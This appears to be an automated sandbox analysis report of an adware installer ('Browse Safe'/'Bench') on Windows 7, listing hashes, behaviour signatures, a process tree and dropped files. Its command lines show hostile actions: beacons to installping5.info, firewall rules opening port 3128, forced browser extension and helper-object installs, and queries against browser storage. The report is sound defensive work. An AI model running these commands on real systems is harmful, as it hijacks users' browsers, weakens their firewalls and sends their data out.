Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-11-2022 13:33

General

  • Target

    6936b21aa2709c3a003de03c85e8323f5e71b3ed137ef24c58072444d640deeb.exe

  • Size

    2.2MB

  • MD5

    de8d7384769c3753016de0282383eb8e

  • SHA1

    fa904b03ccc126d576d7fa3d274bdd49e432a598

  • SHA256

    6936b21aa2709c3a003de03c85e8323f5e71b3ed137ef24c58072444d640deeb

  • SHA512

    988ee29e90d91ced3a0c893b357f2f88c8edc8f417eb70581013778f4efe445c83eebd8dfbfebbe0c7d4c5b43fbbda166d57f4b5da503360dd0cfff23ccc5293

  • SSDEEP

    49152:lAYFke+Ka3HQfV9hfpiQ427oi55gEyyUFjITs/kfyNgVcoWd05s:lAYFH+t3HQ9ZYp8oEgEYUs/kfyKzWd0e

Malware Config

Signatures

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Registers COM server for autorun 1 TTPs 6 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Maps connected drives based on registry 3 TTPs 8 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 18 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6936b21aa2709c3a003de03c85e8323f5e71b3ed137ef24c58072444d640deeb.exe
    "C:\Users\Admin\AppData\Local\Temp\6936b21aa2709c3a003de03c85e8323f5e71b3ed137ef24c58072444d640deeb.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in Program Files directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\SysWOW64\cscript.exe
      cscript.exe //Nologo "ping.js" "http://www.installping5.info/installer-run/7d8ddf61846b7e935471aa6a2906974d/fd89fa71b15e4d1482c23a1ee88f5669/xriderexe/2057784/?pid=38985&sub_id=default&uzid=2057784&subid=&pid=2015" "C:\Users\Admin\AppData\Local\Temp\nsiEF6F.tmp\pz_info" ""
      2⤵
        PID:912
      • C:\Windows\SysWOW64\cscript.exe
        cscript.exe //Nologo "migrate.js" /iversion=20140821 /programfiles="C:\Program Files (x86)" /localapps="C:\Users\Admin\AppData\Local" /chrome-dir="" /firefox-dir="C:\Users\Admin\AppData\Local\Browse Safe\firefox" /ie-dir="C:\Program Files (x86)\Browse Safe" /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1324
        • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe
          SoftwareDetector.exe
          3⤵
          • Executes dropped EXE
          • Checks BIOS information in registry
          • Maps connected drives based on registry
          PID:1592
        • C:\Users\Admin\AppData\Local\Browse Safe\sqlite3.exe
          "C:\Users\Admin\AppData\Local\Browse Safe\sqlite3.exe" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_bnbaolfhobbbokdcmfiplbokkokobjgc_0.localstorage" "SELECT value FROM ItemTable WHERE key='_GPL_zoneid';"
          3⤵
          • Executes dropped EXE
          PID:700
        • C:\Users\Admin\AppData\Local\Browse Safe\sqlite3.exe
          "C:\Users\Admin\AppData\Local\Browse Safe\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fjvnfg6v.Admin\framework-1d10eb57-e111-ea32-c58f-b1eaaeae1962.sqlite" "SELECT value FROM user_storage WHERE key='_GPL_zoneid';"
          3⤵
          • Executes dropped EXE
          PID:1692
        • C:\Users\Admin\AppData\Local\Browse Safe\storageedit.exe
          storageedit.exe ie {8E56A02B-46FE-4490-B169-F16E5231533B} get _GPL_zoneid
          3⤵
          • Executes dropped EXE
          PID:1236
      • C:\Windows\SysWOW64\net.exe
        net.exe start schedule
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:984
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start schedule
          3⤵
            PID:1572
        • C:\Program Files (x86)\Bench\Updater\1.7.0.0\Updater.exe
          "C:\Program Files (x86)\Bench\Updater\1.7.0.0\Updater.exe" -runmode=addsystask
          2⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:1356
        • C:\Program Files (x86)\Bench\Updater\updater.exe
          "C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addtask
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1892
          • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
            "C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addtask
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:1084
        • C:\Program Files (x86)\Bench\Updater\updater.exe
          "C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Temp\nsj3670.tmp"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1896
        • C:\Windows\SysWOW64\cscript.exe
          cscript.exe //Nologo "main_installer.js" install /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
          2⤵
            PID:1396
            • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe
              SoftwareDetector.exe
              3⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Maps connected drives based on registry
              PID:672
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe //Nologo "installer.js" install chrome "" /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
            2⤵
            • Drops file in Drivers directory
            • Loads dropped DLL
            • Drops file in Program Files directory
            PID:1968
            • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe
              SoftwareDetector.exe
              3⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Maps connected drives based on registry
              PID:1444
            • C:\Users\Admin\AppData\Local\Browse Safe\gpedit.exe
              gpedit.exe chrome add-extension bnbaolfhobbbokdcmfiplbokkokobjgc http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY
              3⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              PID:1208
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe //Nologo "chrome_gp_update.js" /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
            2⤵
              PID:1484
            • C:\Program Files (x86)\Bench\BService\1.1\bservice.exe
              "C:\Program Files (x86)\Bench\BService\1.1\bservice.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetWindowsHookEx
              PID:2012
            • C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe
              "C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetWindowsHookEx
              PID:1644
            • C:\Program Files (x86)\Bench\Wd\wd.exe
              "C:\Program Files (x86)\Bench\Wd\wd.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1740
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //Nologo "installer.js" install firefox "C:\Users\Admin\AppData\Local\Browse Safe\firefox\" /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
              2⤵
              • Loads dropped DLL
              PID:1432
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //Nologo "installer.js" install ie "C:\Program Files (x86)\Browse Safe\" /product-name="Browse Safe" /installation-time="1669316696" /pid="2015" /zone="2057784" /czoneid="12199" /nmhost-dir="C:\Program Files (x86)\Bench\NmHost" /app-id="38985" /updateip="54.204.28.26" /version="1.0" /straoi="" /enable-extensions /enable-incognito /chrome-id="bnbaolfhobbbokdcmfiplbokkokobjgc" /chrome-update-url="http://bnbaolfhobbbokdcmfiplbokkokobjgc/check/.eJwNicsNgCAMQHfpmRi9soyhUBQp1EA1Jsbd5fY-L6jrGSz4vUkhMHBT60nqSMs0D0-1q2OmBlbbRQbo0TWF8bGiE467IKLk4EtMJw_KkgWPzcP3A9xAISI.e4txJoPbDKTEASbcxHMzEZLsYhY" /close-chrome /close-firefox /close-ie
              2⤵
              • Loads dropped DLL
              • Drops file in Program Files directory
              • System policy modification
              PID:1296
              • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe
                SoftwareDetector.exe
                3⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Maps connected drives based on registry
                PID:1028
              • C:\Program Files (x86)\Browse Safe\FrameworkEngine.exe
                "C:\Program Files (x86)\Browse Safe\FrameworkEngine.exe" /RegServer
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:2016
              • C:\Windows\SysWOW64\regsvr32.exe
                regsvr32.exe /s "C:\Program Files (x86)\Browse Safe\FrameworkBHO.dll"
                3⤵
                • Loads dropped DLL
                • Installs/modifies Browser Helper Object
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:700
              • C:\Windows\SysWOW64\regsvr32.exe
                regsvr32.exe /s "C:\Program Files (x86)\Browse Safe\FrameworkBHO64.dll"
                3⤵
                • Loads dropped DLL
                PID:560
                • C:\Windows\system32\regsvr32.exe
                  /s "C:\Program Files (x86)\Browse Safe\FrameworkBHO64.dll"
                  4⤵
                  • Registers COM server for autorun
                  • Loads dropped DLL
                  • Installs/modifies Browser Helper Object
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  PID:616
              • C:\Windows\SysWOW64\regsvr32.exe
                regsvr32.exe /s "C:\Program Files (x86)\Browse Safe\RequestHelper.dll"
                3⤵
                • Loads dropped DLL
                PID:432
            • C:\Windows\SysWOW64\netsh.exe
              netsh advfirewall firewall add rule name="proc.exe" protocol=TCP dir=in localport=3128 action=allow program="C:\Program Files (x86)\Bench\Proxy\proc.exe"
              2⤵
              • Modifies Windows Firewall
              • Loads dropped DLL
              PID:1036
            • C:\Windows\SysWOW64\netsh.exe
              netsh advfirewall firewall add rule name="pwdg.exe" protocol=TCP dir=in localport=3128 action=allow program="C:\Program Files (x86)\Bench\Proxy\pwdg.exe"
              2⤵
              • Modifies Windows Firewall
              • Loads dropped DLL
              PID:1908
            • C:\Program Files (x86)\Bench\Proxy\pwdg.exe
              "C:\Program Files (x86)\Bench\Proxy\pwdg.exe"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1904
              • C:\Program Files (x86)\Bench\Proxy\proc.exe
                "C:\Program Files (x86)\Bench\Proxy\proc.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:1760
            • C:\Program Files (x86)\Bench\Updater\updater.exe
              "C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addtask
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1672
              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
                "C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addtask
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                PID:1792
            • C:\Program Files (x86)\Bench\Updater\updater.exe
              "C:\Program Files (x86)\Bench\Updater\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Browse Safe\info.xml"
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1316
              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
                "C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Browse Safe\info.xml"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2016
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //Nologo "ping.js" "http://www.installping5.info/tbi-ping/7d8ddf61846b7e935471aa6a2906974d/fd89fa71b15e4d1482c23a1ee88f5669/xriderexe/2057784/?pid=38985&sub_id=default&uzid=2057784&subid=&pid=2015" "" ""
              2⤵
              • Loads dropped DLL
              PID:1556
            • C:\Windows\SysWOW64\cscript.exe
              cscript.exe //Nologo "ping.js" "http://www.installping5.info/id-check/7d8ddf61846b7e935471aa6a2906974d/" "C:\Users\Admin\AppData\Local\Temp\nsiEF6F.tmp\get.dat" ""
              2⤵
                PID:1296
              • C:\Windows\SysWOW64\cscript.exe
                cscript.exe //Nologo "ping.js" "http://www.installping5.info/newuser-ping/7d8ddf61846b7e935471aa6a2906974d/fd89fa71b15e4d1482c23a1ee88f5669/0/xriderexe/2057784/0/?pid=38985&sub_id=default&uzid=2057784&subid=&pid=2015&os=7&admin=1" "" ""
                2⤵
                  PID:2016
              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe
                "C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe" -runmode=addproduct -info="C:\Users\Admin\AppData\Local\Temp\nsj3670.tmp"
                1⤵
                • Executes dropped EXE
                PID:1184

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files (x86)\Bench\BService\1.1\bhelper.dll

                Filesize

                52KB

                MD5

                72b1a3d56f812839ae5ba3420a5ed812

                SHA1

                0fadb783c6c38284e5819bcaded2a1c50503f7af

                SHA256

                cc54e42139a9f01777833c5fbe9e545e008c74b6fa0abbc37d6d29d9976098be

                SHA512

                5bca01f36822e4345c792e9a65cb9823bed6ab8e7406906e089731c464056b9330dee014a968a5b4c069e72f682cf8167b131e6cc5cdb5478eb36aef6994b2b8

              • C:\Program Files (x86)\Bench\BService\1.1\bhelper64.dll

                Filesize

                108KB

                MD5

                1ee6f52ca4a576a5a21f11bc91634fa1

                SHA1

                cc88403e0541a0f8ab9ebc3beb4eef27132cee1d

                SHA256

                eee40028b8d3074cdd8c44714c04ee514578fddc21bcad9fb35624b4ab3e7865

                SHA512

                1295e08d0cc43c6297ede90aff02f75783939dfe39b6a93de0a701de2e2c84325e6b17374e4adcdf975579935c2cbd6ba39c840ec2bbe2e0bb5908921298d106

              • C:\Program Files (x86)\Bench\BService\1.1\bservice.exe

                Filesize

                51KB

                MD5

                a7bea13873210cdfccb51f54c2799a83

                SHA1

                ccfcd73f208f834c854e46e6f31db11aada5cf08

                SHA256

                e5f5765909b57d992640fb4a48815b0b4e84588b98eef61423dc77e8dc1afa26

                SHA512

                435a16fda6cc3b9e5087e3747a262e05341f89a96529eea182875ca86f23fd23f21a0759973c3f08a8114f2cd2fd589401f3188f08481730deb06fac8d5d00fe

              • C:\Program Files (x86)\Bench\BService\1.1\bservice64.exe

                Filesize

                108KB

                MD5

                f51d7d7a34492a032c2eee93a53308f3

                SHA1

                c9976887ba98e303142d710b450957c5c8ae0d3f

                SHA256

                9b4f14184ad6291b9f919214d973b747b26118a4ffc6dcac5fbdd1309b45379c

                SHA512

                66490aad7a4aab96cd62e8ec7638e1e9de43cb277ec840fd4106ff4b1053ed077e4d4d450ff2890fe3c6cd29051fb98f2d206ca73f50bcb0c80271c80f54e7d5

              • C:\Program Files (x86)\Bench\NmHost\manifest.json

                Filesize

                221B

                MD5

                7309317cdd0cec2dba06e5ff32846b1e

                SHA1

                17853d9ace9e3cee6ad99e07a8b74119d4d72fbd

                SHA256

                34653e0474b69ff3d694250769e35dd261c5646c9dc4241ce6849f34c90ab493

                SHA512

                076dcce420f16409774c56201b5c7d004727af842fccbcdedc84df855431f2ee915d0177079adb6cddec720f35a16c60b1098e3c276b5a89a5f94b4335cd7a9e

              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe

                Filesize

                410KB

                MD5

                599e0d1af556792f220f3d394b99a7f9

                SHA1

                5d470ff7475a5b13f7bfa2f1c85a9fcd87e99aa7

                SHA256

                faed52125c6d007df297356dcce72532ac9fc0e4db131e43442022f479411d62

                SHA512

                4c7ea1db060459404b1149b401ed4ca1000d49e2fc96b42180995f00beb090b539e25f6fe4113f311adebe03dfeac3e006354a0b26ab78c73f9520ab4cd6937c

              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe

                Filesize

                410KB

                MD5

                599e0d1af556792f220f3d394b99a7f9

                SHA1

                5d470ff7475a5b13f7bfa2f1c85a9fcd87e99aa7

                SHA256

                faed52125c6d007df297356dcce72532ac9fc0e4db131e43442022f479411d62

                SHA512

                4c7ea1db060459404b1149b401ed4ca1000d49e2fc96b42180995f00beb090b539e25f6fe4113f311adebe03dfeac3e006354a0b26ab78c73f9520ab4cd6937c

              • C:\Program Files (x86)\Bench\Updater\1.7.0.0\updater.exe

                Filesize

                410KB

                MD5

                599e0d1af556792f220f3d394b99a7f9

                SHA1

                5d470ff7475a5b13f7bfa2f1c85a9fcd87e99aa7

                SHA256

                faed52125c6d007df297356dcce72532ac9fc0e4db131e43442022f479411d62

                SHA512

                4c7ea1db060459404b1149b401ed4ca1000d49e2fc96b42180995f00beb090b539e25f6fe4113f311adebe03dfeac3e006354a0b26ab78c73f9520ab4cd6937c

              • C:\Program Files (x86)\Bench\Updater\updater.exe

                Filesize

                65KB

                MD5

                ce92902a512b35ed0d6c3965c8518aca

                SHA1

                38822f744246b72aefa8b3af625cb63c810771ec

                SHA256

                7c846faf4db707eab53b6364885128a3ab389728b49db492403608eba60a6873

                SHA512

                b852649195bc701fa52a772a0116fb85e99bd3c6529c2aa1718878b7cd8361adaed6f85e560652ce3fe988352f5d1d2d8b9c9b7fb0f02a8c6ceb865c14c79ea6

              • C:\Program Files (x86)\Bench\Updater\updater.exe

                Filesize

                65KB

                MD5

                ce92902a512b35ed0d6c3965c8518aca

                SHA1

                38822f744246b72aefa8b3af625cb63c810771ec

                SHA256

                7c846faf4db707eab53b6364885128a3ab389728b49db492403608eba60a6873

                SHA512

                b852649195bc701fa52a772a0116fb85e99bd3c6529c2aa1718878b7cd8361adaed6f85e560652ce3fe988352f5d1d2d8b9c9b7fb0f02a8c6ceb865c14c79ea6

              • C:\Program Files (x86)\Bench\Wd\wd.exe

                Filesize

                90KB

                MD5

                506bb43c05afe64fd3d5034d39c208be

                SHA1

                558b9f18f39f980bb52f023d2aefe3522591aae9

                SHA256

                5ab5c2450a621db03bd1f0b602adbfe1a73b4d27cb5b1d6ff5adcc026f3830c2

                SHA512

                1eba87a6ceb4d392a73003de9c0316551d7c0f26cb739dee0e3625f3f75563831a7b920909fe89c7e8f3afb54db16892f23d4182ec263e3c3768c0e23291a9bd

              • C:\Program Files (x86)\Browse Safe\extension_info.json

                Filesize

                1KB

                MD5

                6ecb9393af05ea24721e23833a3ce0d7

                SHA1

                7aaea70507788fb8e6229bdcb97781f14cca7546

                SHA256

                51e1bc68a67c73b639aa4d2eb64ed2f3b84f15a332ea9cb0b6180c487a730adb

                SHA512

                42b177407e730943b7cc082b82bcb54c67d7933246e062725df5510764bb23ddd75f643983f8fb2193f7fa0699ae19971d809e934e3badd65ee16efe55caa3f8

              • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe

                Filesize

                77KB

                MD5

                5c6fc5a2b2699c95f30eda0fe744317e

                SHA1

                f23db8cfcef0485cb0fc3ac9cd66c3d2a27d26db

                SHA256

                40545a3c30b0e1b090fb2a281cdb552a3da67a58bc9551594684558d27237833

                SHA512

                759ff1c52f61b482da5f90dde06e576bd63aa61f7571421c5768c0a71c6a219b887fe92fd9e7d28e3e496378983b949015291d346b8be5828f812471a0d0cff9

              • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe

                Filesize

                77KB

                MD5

                5c6fc5a2b2699c95f30eda0fe744317e

                SHA1

                f23db8cfcef0485cb0fc3ac9cd66c3d2a27d26db

                SHA256

                40545a3c30b0e1b090fb2a281cdb552a3da67a58bc9551594684558d27237833

                SHA512

                759ff1c52f61b482da5f90dde06e576bd63aa61f7571421c5768c0a71c6a219b887fe92fd9e7d28e3e496378983b949015291d346b8be5828f812471a0d0cff9

              • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe

                Filesize

                77KB

                MD5

                5c6fc5a2b2699c95f30eda0fe744317e

                SHA1

                f23db8cfcef0485cb0fc3ac9cd66c3d2a27d26db

                SHA256

                40545a3c30b0e1b090fb2a281cdb552a3da67a58bc9551594684558d27237833

                SHA512

                759ff1c52f61b482da5f90dde06e576bd63aa61f7571421c5768c0a71c6a219b887fe92fd9e7d28e3e496378983b949015291d346b8be5828f812471a0d0cff9

              • C:\Users\Admin\AppData\Local\Browse Safe\SoftwareDetector.exe

                Filesize

                77KB

                MD5

                5c6fc5a2b2699c95f30eda0fe744317e

                SHA1

                f23db8cfcef0485cb0fc3ac9cd66c3d2a27d26db

                SHA256

                40545a3c30b0e1b090fb2a281cdb552a3da67a58bc9551594684558d27237833

                SHA512

                759ff1c52f61b482da5f90dde06e576bd63aa61f7571421c5768c0a71c6a219b887fe92fd9e7d28e3e496378983b949015291d346b8be5828f812471a0d0cff9

              • C:\Users\Admin\AppData\Local\Browse Safe\chrome_gp_update.js

                Filesize

                2KB

                MD5

                c15a7afa4a3ed3464df40e6eb840cc73

                SHA1

                51807d6d3f2567de9c4716b32f91ecc8839cc117

                SHA256

                41fe7e7445819a935215fd0928f5bb1bb3a2e3df36f0c27111c99cb716064f18

                SHA512

                90c7a06ceafc6cc7ab35254b3f394702d10881f363527b8fe2e2c6b3fec391141333fe7153a5cae83a6f8889fd55e7a478f1d979497d557fabcb4bcff9cc7ae7

              • C:\Users\Admin\AppData\Local\Browse Safe\chrome_installer.js

                Filesize

                6KB

                MD5

                b84e6bbca06fb8a9489da545c7eefa57

                SHA1

                76035835e1777bfff7d86e7d056392d7bd37e3a7

                SHA256

                aa681b9306c2c020e2164660e266c7298b31fc8b21c1b3abd5151358047ecb1f

                SHA512

                a560f81cdb76ac68f4e056df85789b8576e3f66b408f7a0da1c68f4efe46b63ca17734de20dd476386aa4a9e9122db7800ca8a19475d1d52f121c76db3a89dc4

              • C:\Users\Admin\AppData\Local\Browse Safe\common.js

                Filesize

                13KB

                MD5

                b2138aac6406d0c00245703bba442164

                SHA1

                269be35d6d0c909dfd08950134d7d8d9261c057c

                SHA256

                bb03ad0805409eced066c7c3dac7696761ffcc69a73f21d2ed0b8e13ed731f76

                SHA512

                f450fc962f12d9a9141a01ee7ce93f539909df89b2af01b31c74996f83659ce475c096265633e9f0193cb8e7cc816f042bfab3d5c781d0cc1d24e0df8ebb6c51

              • C:\Users\Admin\AppData\Local\Browse Safe\firefox\extension_info.json

                Filesize

                1KB

                MD5

                db779d7b9f406b0965fdcea5aeb26b7f

                SHA1

                4e680346ee41b89dcbc4162d3b3b9a317d748107

                SHA256

                cc82187d305e1a3737987f6c7f650b1685267cfbfdc4368e8a2cdfbe484802a4

                SHA512

                3e9f2eb08f6f9244d20ea7f99ebe137f8e19106a1410a4341cca6911b90ed69240532708bdccb5935652a11f0f647fbf010d06a582f935975f20f375c64f7493

              • C:\Users\Admin\AppData\Local\Browse Safe\firefox_installer.js

                Filesize

                6KB

                MD5

                6e8d14076e1b88eb8e5f1be916807a9b

                SHA1

                d99d91a0ec88d8d3ff20c983607ae0df539a3200

                SHA256

                c03190cd1fe25cd564fe69ef0c9b4ab1cf4d2fc51118aac60389f68f73953b27

                SHA512

                76b47fba913aa7b5b281584a5145b43a426a54e7ca49ade7682db0171bed67288cb748d6e88d8c8043484c9adfad6a86253d1252fe5e361bba835940f33b59a5

              • C:\Users\Admin\AppData\Local\Browse Safe\gpedit.exe

                Filesize

                91KB

                MD5

                47a3a3fe7cdde150add526bbcd8d571c

                SHA1

                48334e741ecc51cd8715cd12a511eafe4bf5b24b

                SHA256

                4e7f9b09f3eae4088f8cbd4cbc29a03125906775e2724683ae841fe0d71e892e

                SHA512

                6a7efa47735a658f114f981b0f65ea903bd8cf85a1d85d66b8fbba0d63c57a612dd16ae2ede9d15f21d0f93940d3da409852d76cf4d0577574f59dcb36911b21

              • C:\Users\Admin\AppData\Local\Browse Safe\gpedit.exe

                Filesize

                91KB

                MD5

                47a3a3fe7cdde150add526bbcd8d571c

                SHA1

                48334e741ecc51cd8715cd12a511eafe4bf5b24b

                SHA256

                4e7f9b09f3eae4088f8cbd4cbc29a03125906775e2724683ae841fe0d71e892e

                SHA512

                6a7efa47735a658f114f981b0f65ea903bd8cf85a1d85d66b8fbba0d63c57a612dd16ae2ede9d15f21d0f93940d3da409852d76cf4d0577574f59dcb36911b21

              • C:\Users\Admin\AppData\Local\Browse Safe\ie_installer.js

                Filesize

                3KB

                MD5

                3de39b38af916bcf07f7a68c5b065ffe

                SHA1

                5a9dd39ca54f4fc76f805879669b25c5ad29d213
